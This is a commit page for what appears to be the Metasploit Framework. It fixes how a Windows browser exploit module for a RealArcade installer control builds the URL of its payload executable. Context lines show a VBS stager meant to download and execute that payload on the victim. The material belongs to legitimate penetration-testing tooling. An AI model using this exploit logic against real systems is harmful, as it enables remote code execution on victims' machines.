Skip to content

Commit 148ffaf

Browse files
committed
Fix real_arcade_installerdlg datastore
1 parent a7156cf commit 148ffaf

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/browser/real_arcade_installerdlg.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -81,7 +81,7 @@ def on_request_uri(cli, request)
8181

8282
# Payload's URL
8383
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
84-
payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
84+
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
8585

8686
# Create the stager (download + execute payload)
8787
stager_name = rand_text_alpha(6) + ".vbs"

0 commit comments

Comments
 (0)